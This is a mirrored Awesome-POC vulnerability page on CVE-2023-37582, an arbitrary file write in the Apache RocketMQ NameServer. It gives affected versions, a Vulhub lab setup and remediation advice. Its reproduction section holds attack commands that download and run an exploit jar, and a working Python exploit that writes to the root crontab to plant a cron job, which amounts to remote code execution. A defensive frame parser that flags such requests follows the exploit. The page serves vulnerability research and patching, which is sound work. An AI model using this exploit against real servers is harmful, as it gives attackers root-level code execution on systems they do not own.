mirror of
https://github.com/Threekiii/Awesome-POC.git
synced 2025-11-08 12:25:11 +00:00
# Apache RocketMQ NameServer Arbitrary File Write Vulnerability CVE-2023-37582

## Vulnerability Description

Apache RocketMQ is a distributed messaging and streaming platform with low latency, high performance and reliability, trillion-level capacity and flexible scalability.

In RocketMQ versions 5.1.1 and below, the NameServer component contains an arbitrary file write vulnerability. The flaw lies in the configuration update feature of the NameServer. By sending an `UPDATE_NAMESRV_CONFIG` command to the NameServer, an attacker can change the `configStorePath` configuration item together with the configuration contents, which results in an arbitrary file write.

The vulnerability stems from an incomplete fix for [CVE-2023-33246](https://github.com/vulhub/vulhub/tree/master/rocketmq/CVE-2023-33246). When addressing CVE-2023-33246, the upstream team introduced a blacklist of configuration items that must not be modified remotely. However, the patch mistakenly listed the key as `configStorePathName` instead of `configStorePath`, which led to this issue.

References:

- https://github.com/apache/rocketmq/pull/6843
- https://drun1baby.top/2023/11/21/CVE-2023-37582-Apache-RocketMQ-RCE-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/
- https://github.com/Malayke/CVE-2023-37582_EXPLOIT

## Affected Versions

```
RocketMQ < 4.9.7
RocketMQ < 5.1.2
```

## Network Mapping

```
title="RocketMQ"
```

## Environment Setup

In Vulhub, run the following command to start a RocketMQ NameServer 5.1.0:

```shell
docker compose up -d
```

Once the environment is up, the RocketMQ NameServer listens on port 9876.

## Reproduction

Use the Vulhub project [rocketmq-attack](https://github.com/vulhub/rocketmq-attack) to reproduce the vulnerability and write an arbitrary file:

```shell
wget https://github.com/vulhub/rocketmq-attack/releases/download/1.1/rocketmq-attack-1.1-SNAPSHOT.jar
java -jar rocketmq-attack-1.1-SNAPSHOT.jar AttackNamesrv --target your-ip:9876 --file "/tmp/awesome_poc" --data "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
```

After the command completes, verify that the file was written:

```shell
cat /tmp/awesome_poc
```



Scheduled task (cron job):

```python
import socket
import binascii

# target ip and port (9876); fill in before running
target_ip = "your-ip"
target_port = 9876

client = socket.socket()
client.connect((target_ip, target_port))

# payload: JSON header (request code 318 = UPDATE_NAMESRV_CONFIG) and properties body
json = '{"code":318,"extFields":{"test":"RockedtMQ"},"flag":0,"language":"JAVA","opaque":266,"serializeTypeCurrentRPC":"JSON","version":435}'.encode('utf-8')
body='configStorePath=/var/spool/cron/crontabs/root\nbrokerConfigPath=/var/spool/cron/crontabs/root\nbindAddress=0.0.0.0\\n*/1 * * * * touch /tmp/success'.encode('utf-8')

# header length field (4 bytes, big endian)
json_lens = int(len(binascii.hexlify(json).decode('utf-8'))/2)
head1 = '00000000'+str(hex(json_lens))[2:]
print(head1)

# total length field: 4 (header length field) + body + header
all_lens = int(4+len(binascii.hexlify(body).decode('utf-8'))/2+json_lens)
head2 = '00000000'+str(hex(all_lens))[2:]
print(head2)

data = head2[-8:]+head1[-8:]+binascii.hexlify(json).decode('utf-8')+binascii.hexlify(body).decode('utf-8')

# send the frame and read the response
client.send(bytes.fromhex(data))
data_recv = client.recv(1024)
print(data_recv)
```
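As an added defender-side example (not code from the original page or from the RocketMQ project), the following parses the remoting frame layout the PoC above builds (total length, header length field, JSON header, properties body) and flags `UPDATE_NAMESRV_CONFIG` (code 318) requests whose `key=value` body sets `configStorePath`, the key the CVE-2023-33246 patch should have blacklisted. The watchlist, `build_frame` and the two sample frames are constructed for illustration; the serialize-type check assumes the JSON header encoding the PoC uses.

```python
import json
import struct

UPDATE_NAMESRV_CONFIG = 318  # request code used by the PoC on this page
# Assumed watchlist; configStorePath is the key CVE-2023-37582 is about.
WATCHED_KEYS = {"configStorePath"}


def parse_frame(raw: bytes):
    """Split a RocketMQ remoting frame into (JSON header dict, body bytes).

    Layout: 4-byte total length (excluding itself), 4-byte field whose top
    byte is the serialize type (0 = JSON) and low 3 bytes the header length,
    then the header and the raw body.
    """
    if len(raw) < 8:
        raise ValueError("frame too short")
    total_len, hdr_field = struct.unpack(">II", raw[:8])
    if hdr_field >> 24 != 0:
        raise ValueError("only JSON headers are handled here")
    header_len = hdr_field & 0x00FFFFFF
    if 4 + header_len > total_len or len(raw) < 4 + total_len:
        raise ValueError("inconsistent frame lengths")
    header = json.loads(raw[8:8 + header_len])
    return header, raw[8 + header_len:4 + total_len]


def flagged_config_keys(raw: bytes):
    """Watched keys that an UPDATE_NAMESRV_CONFIG body ('key=value' lines) sets."""
    header, body = parse_frame(raw)
    if header.get("code") != UPDATE_NAMESRV_CONFIG:
        return []  # not a config update, nothing to flag
    flagged = []
    for line in body.decode("utf-8", errors="replace").splitlines():
        key, sep, _ = line.partition("=")
        if sep and key.strip() in WATCHED_KEYS:
            flagged.append(key.strip())
    return flagged


def build_frame(header: dict, body: bytes) -> bytes:
    """Encode a frame; used here only to construct the sample captures."""
    hdr = json.dumps(header).encode("utf-8")
    return struct.pack(">II", 4 + len(hdr) + len(body), len(hdr)) + hdr + body


# Constructed sample captures (not real traffic): one tries to redirect
# configStorePath, the other only touches a harmless key.
HEADER = {"code": UPDATE_NAMESRV_CONFIG, "flag": 0, "language": "JAVA",
          "opaque": 1, "serializeTypeCurrentRPC": "JSON", "version": 435}
SUSPICIOUS = build_frame(HEADER, b"configStorePath=/tmp/constructed\nbindAddress=0.0.0.0\n")
BENIGN = build_frame(HEADER, b"bindAddress=0.0.0.0\n")
```

Run `flagged_config_keys` over frames captured on port 9876 (or over the body of a NameServer request log) to alert on attempts to move the config store path, and pair it with the version upgrade below since detection alone does not close the hole.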

## Remediation

Official fixed versions have been released; affected users are advised to upgrade to:

- RocketMQ 5.x >= 5.1.2
- RocketMQ 4.x >= 4.9.7

Official patch download: https://rocketmq.apache.org/download/ . It is also recommended to deploy the NameServer, Broker and other components on an internal network and to add authentication and authorization.